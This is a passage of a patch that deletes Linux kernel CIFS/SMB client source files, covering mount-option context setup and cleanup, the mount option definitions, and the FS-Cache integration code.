+-	/* default to using server inode numbers where available */
+-	ctx->server_ino = 1;
+-
+-	/* default is to use strict cifs caching semantics */
+-	ctx->strict_io = true;
+-
+-	ctx->acregmax = CIFS_DEF_ACTIMEO;
+-	ctx->acdirmax = CIFS_DEF_ACTIMEO;
+-	ctx->closetimeo = SMB3_DEF_DCLOSETIMEO;
+-
+-	/* Most clients set timeout to 0, allows server to use its default */
+-	ctx->handle_timeout = 0; /* See MS-SMB2 spec section 2.2.14.2.12 */
+-
+-	/* offer SMB2.1 and later (SMB3 etc). Secure and widely accepted */
+-	ctx->ops = &smb30_operations;
+-	ctx->vals = &smbdefault_values;
+-
+-	ctx->echo_interval = SMB_ECHO_INTERVAL_DEFAULT;
+-
+-	/* default to no multichannel (single server connection) */
+-	ctx->multichannel = false;
+-	ctx->max_channels = 1;
+-
+-	ctx->backupuid_specified = false; /* no backup intent for a user */
+-	ctx->backupgid_specified = false; /* no backup intent for a group */
+-
+-/*
+- *	short int override_uid = -1;
+- *	short int override_gid = -1;
+- *	char *nodename = strdup(utsname()->nodename);
+- *	struct sockaddr *dstaddr = (struct sockaddr *)&vol->dstaddr;
+- */
+-
+-	fc->fs_private = ctx;
+-	fc->ops = &smb3_fs_context_ops;
+-	return 0;
+-}
+-
+-void
+-smb3_cleanup_fs_context_contents(struct smb3_fs_context *ctx)
+-{
+-	if (ctx == NULL)
+-		return;
+-
+-	/*
+-	 * Make sure this stays in sync with smb3_fs_context_dup()
+-	 */
+-	kfree(ctx->mount_options);
+-	ctx->mount_options = NULL;
+-	kfree(ctx->username);
+-	ctx->username = NULL;
+-	kfree_sensitive(ctx->password);
+-	ctx->password = NULL;
+-	kfree(ctx->server_hostname);
+-	ctx->server_hostname = NULL;
+-	kfree(ctx->UNC);
+-	ctx->UNC = NULL;
+-	kfree(ctx->source);
+-	ctx->source = NULL;
+-	kfree(ctx->domainname);
+-	ctx->domainname = NULL;
+-	kfree(ctx->nodename);
+-	ctx->nodename = NULL;
+-	kfree(ctx->iocharset);
+-	ctx->iocharset = NULL;
+-	kfree(ctx->prepath);
+-	ctx->prepath = NULL;
+-}
+-
+-void
+-smb3_cleanup_fs_context(struct smb3_fs_context *ctx)
+-{
+-	if (!ctx)
+-		return;
+-	smb3_cleanup_fs_context_contents(ctx);
+-	kfree(ctx);
+-}
+-
+-void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb)
+-{
+-	struct smb3_fs_context *ctx = cifs_sb->ctx;
+-
+-	if (ctx->nodfs)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_DFS;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_DFS;
+-
+-	if (ctx->noperm)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_PERM;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_PERM;
+-
+-	if (ctx->setuids)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_SET_UID;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SET_UID;
+-
+-	if (ctx->setuidfromacl)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_UID_FROM_ACL;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_UID_FROM_ACL;
+-
+-	if (ctx->server_ino)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_SERVER_INUM;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SERVER_INUM;
+-
+-	if (ctx->remap)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MAP_SFM_CHR;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MAP_SFM_CHR;
+-
+-	if (ctx->sfu_remap)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MAP_SPECIAL_CHR;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MAP_SPECIAL_CHR;
+-
+-	if (ctx->no_xattr)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_XATTR;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_XATTR;
+-
+-	if (ctx->sfu_emul)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_UNX_EMUL;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_UNX_EMUL;
+-
+-	if (ctx->nobrl)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_BRL;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_BRL;
+-
+-	if (ctx->nohandlecache)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_HANDLE_CACHE;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_HANDLE_CACHE;
+-
+-	if (ctx->nostrictsync)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NOSSYNC;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NOSSYNC;
+-
+-	if (ctx->mand_lock)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NOPOSIXBRL;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NOPOSIXBRL;
+-
+-	if (ctx->rwpidforward)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_RWPIDFORWARD;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_RWPIDFORWARD;
+-
+-	if (ctx->mode_ace)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MODE_FROM_SID;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MODE_FROM_SID;
+-
+-	if (ctx->cifs_acl)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_CIFS_ACL;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_CIFS_ACL;
+-
+-	if (ctx->backupuid_specified)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_CIFS_BACKUPUID;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_CIFS_BACKUPUID;
+-
+-	if (ctx->backupgid_specified)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_CIFS_BACKUPGID;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_CIFS_BACKUPGID;
+-
+-	if (ctx->override_uid)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_OVERR_UID;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_OVERR_UID;
+-
+-	if (ctx->override_gid)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_OVERR_GID;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_OVERR_GID;
+-
+-	if (ctx->dynperm)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_DYNPERM;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_DYNPERM;
+-
+-	if (ctx->fsc)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_FSCACHE;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_FSCACHE;
+-
+-	if (ctx->multiuser)
+-		cifs_sb->mnt_cifs_flags |= (CIFS_MOUNT_MULTIUSER |
+-					    CIFS_MOUNT_NO_PERM);
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MULTIUSER;
+-
+-
+-	if (ctx->strict_io)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_STRICT_IO;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_STRICT_IO;
+-
+-	if (ctx->direct_io)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_DIRECT_IO;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_DIRECT_IO;
+-
+-	if (ctx->mfsymlinks)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MF_SYMLINKS;
+-	else
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MF_SYMLINKS;
+-	if (ctx->mfsymlinks) {
+-		if (ctx->sfu_emul) {
+-			/*
+-			 * Our SFU ("Services for Unix" emulation does not allow
+-			 * creating symlinks but does allow reading existing SFU
+-			 * symlinks (it does allow both creating and reading SFU
+-			 * style mknod and FIFOs though). When "mfsymlinks" and
+-			 * "sfu" are both enabled at the same time, it allows
+-			 * reading both types of symlinks, but will only create
+-			 * them with mfsymlinks format. This allows better
+-			 * Apple compatibility (probably better for Samba too)
+-			 * while still recognizing old Windows style symlinks.
+-			 */
+-			cifs_dbg(VFS, "mount options mfsymlinks and sfu both enabled\n");
+-		}
+-	}
+-	cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SHUTDOWN;
+-
+-	return;
+-}
+diff --git a/fs/cifs/fs_context.h b/fs/cifs/fs_context.h
+deleted file mode 100644
+index 26093f54d3e65..0000000000000
+--- a/fs/cifs/fs_context.h
++++ /dev/null
+@@ -1,293 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2020, Microsoft Corporation.
+- *
+- *   Author(s): Steve French <stfrench@microsoft.com>
+- *              David Howells <dhowells@redhat.com>
+- */
+-
+-#ifndef _FS_CONTEXT_H
+-#define _FS_CONTEXT_H
+-
+-#include "cifsglob.h"
+-#include <linux/parser.h>
+-#include <linux/fs_parser.h>
+-
+-/* Log errors in fs_context (new mount api) but also in dmesg (old style) */
+-#define cifs_errorf(fc, fmt, ...)			\
+-	do {						\
+-		errorf(fc, fmt, ## __VA_ARGS__);	\
+-		cifs_dbg(VFS, fmt, ## __VA_ARGS__);	\
+-	} while (0)
+-
+-enum smb_version {
+-	Smb_1 = 1,
+-	Smb_20,
+-	Smb_21,
+-	Smb_30,
+-	Smb_302,
+-	Smb_311,
+-	Smb_3any,
+-	Smb_default,
+-	Smb_version_err
+-};
+-
+-enum {
+-	Opt_cache_loose,
+-	Opt_cache_strict,
+-	Opt_cache_none,
+-	Opt_cache_ro,
+-	Opt_cache_rw,
+-	Opt_cache_err
+-};
+-
+-enum cifs_sec_param {
+-	Opt_sec_krb5,
+-	Opt_sec_krb5i,
+-	Opt_sec_krb5p,
+-	Opt_sec_ntlmsspi,
+-	Opt_sec_ntlmssp,
+-	Opt_sec_ntlmv2,
+-	Opt_sec_ntlmv2i,
+-	Opt_sec_none,
+-
+-	Opt_sec_err
+-};
+-
+-enum cifs_param {
+-	/* Mount options that take no arguments */
+-	Opt_user_xattr,
+-	Opt_forceuid,
+-	Opt_forcegid,
+-	Opt_noblocksend,
+-	Opt_noautotune,
+-	Opt_nolease,
+-	Opt_nosparse,
+-	Opt_hard,
+-	Opt_soft,
+-	Opt_perm,
+-	Opt_nodelete,
+-	Opt_mapposix,
+-	Opt_mapchars,
+-	Opt_nomapchars,
+-	Opt_sfu,
+-	Opt_nodfs,
+-	Opt_posixpaths,
+-	Opt_unix,
+-	Opt_nocase,
+-	Opt_brl,
+-	Opt_handlecache,
+-	Opt_forcemandatorylock,
+-	Opt_setuidfromacl,
+-	Opt_setuids,
+-	Opt_dynperm,
+-	Opt_intr,
+-	Opt_strictsync,
+-	Opt_serverino,
+-	Opt_rwpidforward,
+-	Opt_cifsacl,
+-	Opt_acl,
+-	Opt_locallease,
+-	Opt_sign,
+-	Opt_ignore_signature,
+-	Opt_seal,
+-	Opt_noac,
+-	Opt_fsc,
+-	Opt_mfsymlinks,
+-	Opt_multiuser,
+-	Opt_sloppy,
+-	Opt_nosharesock,
+-	Opt_persistent,
+-	Opt_resilient,
+-	Opt_tcp_nodelay,
+-	Opt_domainauto,
+-	Opt_rdma,
+-	Opt_modesid,
+-	Opt_rootfs,
+-	Opt_multichannel,
+-	Opt_compress,
+-	Opt_witness,
+-
+-	/* Mount options which take numeric value */
+-	Opt_backupuid,
+-	Opt_backupgid,
+-	Opt_uid,
+-	Opt_cruid,
+-	Opt_gid,
+-	Opt_port,
+-	Opt_file_mode,
+-	Opt_dirmode,
+-	Opt_min_enc_offload,
+-	Opt_blocksize,
+-	Opt_rasize,
+-	Opt_rsize,
+-	Opt_wsize,
+-	Opt_actimeo,
+-	Opt_acdirmax,
+-	Opt_acregmax,
+-	Opt_closetimeo,
+-	Opt_echo_interval,
+-	Opt_max_credits,
+-	Opt_snapshot,
+-	Opt_max_channels,
+-	Opt_handletimeout,
+-
+-	/* Mount options which take string value */
+-	Opt_source,
+-	Opt_user,
+-	Opt_pass,
+-	Opt_ip,
+-	Opt_domain,
+-	Opt_srcaddr,
+-	Opt_iocharset,
+-	Opt_netbiosname,
+-	Opt_servern,
+-	Opt_ver,
+-	Opt_vers,
+-	Opt_sec,
+-	Opt_cache,
+-
+-	/* Mount options to be ignored */
+-	Opt_ignore,
+-
+-	Opt_err
+-};
+-
+-struct smb3_fs_context {
+-	bool uid_specified;
+-	bool cruid_specified;
+-	bool gid_specified;
+-	bool sloppy;
+-	bool got_ip;
+-	bool got_version;
+-	bool got_rsize;
+-	bool got_wsize;
+-	bool got_bsize;
+-	unsigned short port;
+-
+-	char *username;
+-	char *password;
+-	char *domainname;
+-	char *source;
+-	char *server_hostname;
+-	char *UNC;
+-	char *nodename;
+-	char workstation_name[CIFS_MAX_WORKSTATION_LEN];
+-	char *iocharset;  /* local code page for mapping to and from Unicode */
+-	char source_rfc1001_name[RFC1001_NAME_LEN_WITH_NULL]; /* clnt nb name */
+-	char target_rfc1001_name[RFC1001_NAME_LEN_WITH_NULL]; /* srvr nb name */
+-	kuid_t cred_uid;
+-	kuid_t linux_uid;
+-	kgid_t linux_gid;
+-	kuid_t backupuid;
+-	kgid_t backupgid;
+-	umode_t file_mode;
+-	umode_t dir_mode;
+-	enum securityEnum sectype; /* sectype requested via mnt opts */
+-	bool sign; /* was signing requested via mnt opts? */
+-	bool ignore_signature:1;
+-	bool retry:1;
+-	bool intr:1;
+-	bool setuids:1;
+-	bool setuidfromacl:1;
+-	bool override_uid:1;
+-	bool override_gid:1;
+-	bool dynperm:1;
+-	bool noperm:1;
+-	bool nodelete:1;
+-	bool mode_ace:1;
+-	bool no_psx_acl:1; /* set if posix acl support should be disabled */
+-	bool cifs_acl:1;
+-	bool backupuid_specified; /* mount option  backupuid  is specified */
+-	bool backupgid_specified; /* mount option  backupgid  is specified */
+-	bool no_xattr:1;   /* set if xattr (EA) support should be disabled*/
+-	bool server_ino:1; /* use inode numbers from server ie UniqueId */
+-	bool direct_io:1;
+-	bool strict_io:1; /* strict cache behavior */
+-	bool cache_ro:1;
+-	bool cache_rw:1;
+-	bool remap:1;      /* set to remap seven reserved chars in filenames */
+-	bool sfu_remap:1;  /* remap seven reserved chars ala SFU */
+-	bool posix_paths:1; /* unset to not ask for posix pathnames. */
+-	bool no_linux_ext:1;
+-	bool linux_ext:1;
+-	bool sfu_emul:1;
+-	bool nullauth:1;   /* attempt to authenticate with null user */
+-	bool nocase:1;     /* request case insensitive filenames */
+-	bool nobrl:1;      /* disable sending byte range locks to srv */
+-	bool nohandlecache:1; /* disable caching dir handles if srvr probs */
+-	bool mand_lock:1;  /* send mandatory not posix byte range lock reqs */
+-	bool seal:1;       /* request transport encryption on share */
+-	bool nodfs:1;      /* Do not request DFS, even if available */
+-	bool local_lease:1; /* check leases only on local system, not remote */
+-	bool noblocksnd:1;
+-	bool noautotune:1;
+-	bool nostrictsync:1; /* do not force expensive SMBflush on every sync */
+-	bool no_lease:1;     /* disable requesting leases */
+-	bool no_sparse:1;    /* do not attempt to set files sparse */
+-	bool fsc:1;	/* enable fscache */
+-	bool mfsymlinks:1; /* use Minshall+French Symlinks */
+-	bool multiuser:1;
+-	bool rwpidforward:1; /* pid forward for read/write operations */
+-	bool nosharesock:1;
+-	bool persistent:1;
+-	bool nopersistent:1;
+-	bool resilient:1; /* noresilient not required since not fored for CA */
+-	bool domainauto:1;
+-	bool rdma:1;
+-	bool multichannel:1;
+-	bool use_client_guid:1;
+-	/* reuse existing guid for multichannel */
+-	u8 client_guid[SMB2_CLIENT_GUID_SIZE];
+-	unsigned int bsize;
+-	unsigned int rasize;
+-	unsigned int rsize;
+-	unsigned int wsize;
+-	unsigned int min_offload;
+-	bool sockopt_tcp_nodelay:1;
+-	/* attribute cache timemout for files and directories in jiffies */
+-	unsigned long acregmax;
+-	unsigned long acdirmax;
+-	/* timeout for deferred close of files in jiffies */
+-	unsigned long closetimeo;
+-	struct smb_version_operations *ops;
+-	struct smb_version_values *vals;
+-	char *prepath;
+-	struct sockaddr_storage dstaddr; /* destination address */
+-	struct sockaddr_storage srcaddr; /* allow binding to a local IP */
+-	struct nls_table *local_nls; /* This is a copy of the pointer in cifs_sb */
+-	unsigned int echo_interval; /* echo interval in secs */
+-	__u64 snapshot_time; /* needed for timewarp tokens */
+-	__u32 handle_timeout; /* persistent and durable handle timeout in ms */
+-	unsigned int max_credits; /* smb3 max_credits 10 < credits < 60000 */
+-	unsigned int max_channels;
+-	__u16 compression; /* compression algorithm 0xFFFF default 0=disabled */
+-	bool rootfs:1; /* if it's a SMB root file system */
+-	bool witness:1; /* use witness protocol */
+-
+-	char *mount_options;
+-};
+-
+-extern const struct fs_parameter_spec smb3_fs_parameters[];
+-
+-extern int smb3_init_fs_context(struct fs_context *fc);
+-extern void smb3_cleanup_fs_context_contents(struct smb3_fs_context *ctx);
+-extern void smb3_cleanup_fs_context(struct smb3_fs_context *ctx);
+-
+-static inline struct smb3_fs_context *smb3_fc2context(const struct fs_context *fc)
+-{
+-	return fc->fs_private;
+-}
+-
+-extern int smb3_fs_context_dup(struct smb3_fs_context *new_ctx, struct smb3_fs_context *ctx);
+-extern void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb);
+-
+-/*
+- * max deferred close timeout (jiffies) - 2^30
+- */
+-#define SMB3_MAX_DCLOSETIMEO (1 << 30)
+-#define SMB3_DEF_DCLOSETIMEO (1 * HZ) /* even 1 sec enough to help eg open/write/close/open/read */
+-
+-extern char *cifs_sanitize_prepath(char *prepath, gfp_t gfp);
+-
+-#endif
+diff --git a/fs/cifs/fscache.c b/fs/cifs/fscache.c
+deleted file mode 100644
+index f6f3a6b75601b..0000000000000
+--- a/fs/cifs/fscache.c
++++ /dev/null
+@@ -1,253 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *   CIFS filesystem cache interface
+- *
+- *   Copyright (c) 2010 Novell, Inc.
+- *   Author(s): Suresh Jayaraman <sjayaraman@suse.de>
+- *
+- */
+-#include "fscache.h"
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifsproto.h"
+-
+-static void cifs_fscache_fill_volume_coherency(
+-	struct cifs_tcon *tcon,
+-	struct cifs_fscache_volume_coherency_data *cd)
+-{
+-	memset(cd, 0, sizeof(*cd));
+-	cd->resource_id		= cpu_to_le64(tcon->resource_id);
+-	cd->vol_create_time	= tcon->vol_create_time;
+-	cd->vol_serial_number	= cpu_to_le32(tcon->vol_serial_number);
+-}
+-
+-int cifs_fscache_get_super_cookie(struct cifs_tcon *tcon)
+-{
+-	struct cifs_fscache_volume_coherency_data cd;
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct fscache_volume *vcookie;
+-	const struct sockaddr *sa = (struct sockaddr *)&server->dstaddr;
+-	size_t slen, i;
+-	char *sharename;
+-	char *key;
+-	int ret = -ENOMEM;
+-
+-	tcon->fscache = NULL;
+-	switch (sa->sa_family) {
+-	case AF_INET:
+-	case AF_INET6:
+-		break;
+-	default:
+-		cifs_dbg(VFS, "Unknown network family '%d'\n", sa->sa_family);
+-		return -EINVAL;
+-	}
+-
+-	memset(&key, 0, sizeof(key));
+-
+-	sharename = extract_sharename(tcon->tree_name);
+-	if (IS_ERR(sharename)) {
+-		cifs_dbg(FYI, "%s: couldn't extract sharename\n", __func__);
+-		return -EINVAL;
+-	}
+-
+-	slen = strlen(sharename);
+-	for (i = 0; i < slen; i++)
+-		if (sharename[i] == '/')
+-			sharename[i] = ';';
+-
+-	key = kasprintf(GFP_KERNEL, "cifs,%pISpc,%s", sa, sharename);
+-	if (!key)
+-		goto out;
+-
+-	cifs_fscache_fill_volume_coherency(tcon, &cd);
+-	vcookie = fscache_acquire_volume(key,
+-					 NULL, /* preferred_cache */
+-					 &cd, sizeof(cd));
+-	cifs_dbg(FYI, "%s: (%s/0x%p)\n", __func__, key, vcookie);
+-	if (IS_ERR(vcookie)) {
+-		if (vcookie != ERR_PTR(-EBUSY)) {
+-			ret = PTR_ERR(vcookie);
+-			goto out_2;
+-		}
+-		pr_err("Cache volume key already in use (%s)\n", key);
+-		vcookie = NULL;
+-	}
+-
+-	tcon->fscache = vcookie;
+-	ret = 0;
+-out_2:
+-	kfree(key);
+-out:
+-	kfree(sharename);
+-	return ret;
+-}
+-
+-void cifs_fscache_release_super_cookie(struct cifs_tcon *tcon)
+-{
+-	struct cifs_fscache_volume_coherency_data cd;
+-
+-	cifs_dbg(FYI, "%s: (0x%p)\n", __func__, tcon->fscache);
+-
+-	cifs_fscache_fill_volume_coherency(tcon, &cd);
+-	fscache_relinquish_volume(tcon->fscache, &cd, false);
+-	tcon->fscache = NULL;
+-}
+-
+-void cifs_fscache_get_inode_cookie(struct inode *inode)
+-{
+-	struct cifs_fscache_inode_coherency_data cd;
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-	cifs_fscache_fill_coherency(&cifsi->netfs.inode, &cd);
+-
+-	cifsi->netfs.cache =
+-		fscache_acquire_cookie(tcon->fscache, 0,
+-				       &cifsi->uniqueid, sizeof(cifsi->uniqueid),
+-				       &cd, sizeof(cd),
+-				       i_size_read(&cifsi->netfs.inode));
+-}
+-
+-void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update)
+-{
+-	if (update) {
+-		struct cifs_fscache_inode_coherency_data cd;
+-		loff_t i_size = i_size_read(inode);
+-
+-		cifs_fscache_fill_coherency(inode, &cd);
+-		fscache_unuse_cookie(cifs_inode_cookie(inode), &cd, &i_size);
+-	} else {
+-		fscache_unuse_cookie(cifs_inode_cookie(inode), NULL, NULL);
+-	}
+-}
+-
+-void cifs_fscache_release_inode_cookie(struct inode *inode)
+-{
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
+-
+-	if (cookie) {
+-		cifs_dbg(FYI, "%s: (0x%p)\n", __func__, cookie);
+-		fscache_relinquish_cookie(cookie, false);
+-		cifsi->netfs.cache = NULL;
+-	}
+-}
+-
+-/*
+- * Fallback page reading interface.
+- */
+-static int fscache_fallback_read_page(struct inode *inode, struct page *page)
+-{
+-	struct netfs_cache_resources cres;
+-	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
+-	struct iov_iter iter;
+-	struct bio_vec bvec[1];
+-	int ret;
+-
+-	memset(&cres, 0, sizeof(cres));
+-	bvec[0].bv_page		= page;
+-	bvec[0].bv_offset	= 0;
+-	bvec[0].bv_len		= PAGE_SIZE;
+-	iov_iter_bvec(&iter, ITER_DEST, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
+-
+-	ret = fscache_begin_read_operation(&cres, cookie);
+-	if (ret < 0)
+-		return ret;
+-
+-	ret = fscache_read(&cres, page_offset(page), &iter, NETFS_READ_HOLE_FAIL,
+-			   NULL, NULL);
+-	fscache_end_operation(&cres);
+-	return ret;
+-}
+-
+-/*
+- * Fallback page writing interface.
+- */
+-static int fscache_fallback_write_page(struct inode *inode, struct page *page,
+-				       bool no_space_allocated_yet)
+-{
+-	struct netfs_cache_resources cres;
+-	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
+-	struct iov_iter iter;
+-	struct bio_vec bvec[1];
+-	loff_t start = page_offset(page);
+-	size_t len = PAGE_SIZE;
+-	int ret;
+-
+-	memset(&cres, 0, sizeof(cres));
+-	bvec[0].bv_page		= page;
+-	bvec[0].bv_offset	= 0;
+-	bvec[0].bv_len		= PAGE_SIZE;
+-	iov_iter_bvec(&iter, ITER_SOURCE, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
+-
+-	ret = fscache_begin_write_operation(&cres, cookie);
+-	if (ret < 0)
+-		return ret;
+-
+-	ret = cres.ops->prepare_write(&cres, &start, &len, i_size_read(inode),
+-				      no_space_allocated_yet);
+-	if (ret == 0)
+-		ret = fscache_write(&cres, page_offset(page), &iter, NULL, NULL);
+-	fscache_end_operation(&cres);
+-	return ret;
+-}
+-
+-/*
+- * Retrieve a page from FS-Cache
+- */
+-int __cifs_readpage_from_fscache(struct inode *inode, struct page *page)
+-{
+-	int ret;
+-
+-	cifs_dbg(FYI, "%s: (fsc:%p, p:%p, i:0x%p\n",
+-		 __func__, cifs_inode_cookie(inode), page, inode);
+-
+-	ret = fscache_fallback_read_page(inode, page);
+-	if (ret < 0)
+-		return ret;
+-
+-	/* Read completed synchronously */
+-	SetPageUptodate(page);
+-	return 0;
+-}
+-
+-void __cifs_readpage_to_fscache(struct inode *inode, struct page *page)
+-{
+-	cifs_dbg(FYI, "%s: (fsc: %p, p: %p, i: %p)\n",
+-		 __func__, cifs_inode_cookie(inode), page, inode);
+-
+-	fscache_fallback_write_page(inode, page, true);
+-}
+-
+-/*
+- * Query the cache occupancy.
+- */
+-int __cifs_fscache_query_occupancy(struct inode *inode,
+-				   pgoff_t first, unsigned int nr_pages,
+-				   pgoff_t *_data_first,
+-				   unsigned int *_data_nr_pages)
+-{
+-	struct netfs_cache_resources cres;
+-	struct fscache_cookie *cookie = cifs_inode_cookie(inode);
+-	loff_t start, data_start;
+-	size_t len, data_len;
+-	int ret;
+-
+-	ret = fscache_begin_read_operation(&cres, cookie);
+-	if (ret < 0)
+-		return ret;
+-
+-	start = first * PAGE_SIZE;
+-	len = nr_pages * PAGE_SIZE;
+-	ret = cres.ops->query_occupancy(&cres, start, len, PAGE_SIZE,
+-					&data_start, &data_len);
+-	if (ret == 0) {
+-		*_data_first = data_start / PAGE_SIZE;
+-		*_data_nr_pages = len / PAGE_SIZE;
+-	}
+-
+-	fscache_end_operation(&cres);
+-	return ret;
+-}
+diff --git a/fs/cifs/fscache.h b/fs/cifs/fscache.h
+deleted file mode 100644
+index 67b601041f0a3..0000000000000
+--- a/fs/cifs/fscache.h
++++ /dev/null
+@@ -1,148 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *   CIFS filesystem cache interface definitions
+- *
+- *   Copyright (c) 2010 Novell, Inc.
+- *   Authors(s): Suresh Jayaraman (sjayaraman@suse.de>
+- *
+- */
+-#ifndef _CIFS_FSCACHE_H
+-#define _CIFS_FSCACHE_H
+-
+-#include <linux/swap.h>
+-#include <linux/fscache.h>
+-
+-#include "cifsglob.h"
+-
+-/*
+- * Coherency data attached to CIFS volume within the cache
+- */
+-struct cifs_fscache_volume_coherency_data {
+-	__le64	resource_id;		/* unique server resource id */
+-	__le64	vol_create_time;
+-	__le32	vol_serial_number;
+-} __packed;
+-
+-/*
+- * Coherency data attached to CIFS inode within the cache.
+- */
+-struct cifs_fscache_inode_coherency_data {
+-	__le64 last_write_time_sec;
+-	__le64 last_change_time_sec;
+-	__le32 last_write_time_nsec;
+-	__le32 last_change_time_nsec;
+-};
+-
+-#ifdef CONFIG_CIFS_FSCACHE
+-
+-/*
+- * fscache.c
+- */
+-extern int cifs_fscache_get_super_cookie(struct cifs_tcon *);
+-extern void cifs_fscache_release_super_cookie(struct cifs_tcon *);
+-
+-extern void cifs_fscache_get_inode_cookie(struct inode *inode);
+-extern void cifs_fscache_release_inode_cookie(struct inode *);
+-extern void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update);
+-
+-static inline
+-void cifs_fscache_fill_coherency(struct inode *inode,
+-				 struct cifs_fscache_inode_coherency_data *cd)
+-{
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-
+-	memset(cd, 0, sizeof(*cd));
+-	cd->last_write_time_sec   = cpu_to_le64(cifsi->netfs.inode.i_mtime.tv_sec);
+-	cd->last_write_time_nsec  = cpu_to_le32(cifsi->netfs.inode.i_mtime.tv_nsec);
+-	cd->last_change_time_sec  = cpu_to_le64(cifsi->netfs.inode.i_ctime.tv_sec);
+-	cd->last_change_time_nsec = cpu_to_le32(cifsi->netfs.inode.i_ctime.tv_nsec);
+-}
+-
+-
+-static inline struct fscache_cookie *cifs_inode_cookie(struct inode *inode)
+-{
+-	return netfs_i_cookie(&CIFS_I(inode)->netfs);
+-}
+-
+-static inline void cifs_invalidate_cache(struct inode *inode, unsigned int flags)
+-{
+-	struct cifs_fscache_inode_coherency_data cd;
+-
+-	cifs_fscache_fill_coherency(inode, &cd);
+-	fscache_invalidate(cifs_inode_cookie(inode), &cd,
+-			   i_size_read(inode), flags);
+-}
+-
+-extern int __cifs_fscache_query_occupancy(struct inode *inode,
+-					  pgoff_t first, unsigned int nr_pages,
+-					  pgoff_t *_data_first,
+-					  unsigned int *_data_nr_pages);
+-
+-static inline int cifs_fscache_query_occupancy(struct inode *inode,
+-					       pgoff_t first, unsigned int nr_pages,
+-					       pgoff_t *_data_first,
+-					       unsigned int *_data_nr_pages)
+-{
+-	if (!cifs_inode_cookie(inode))
+-		return -ENOBUFS;
+-	return __cifs_fscache_query_occupancy(inode, first, nr_pages,
+-					      _data_first, _data_nr_pages);
+-}
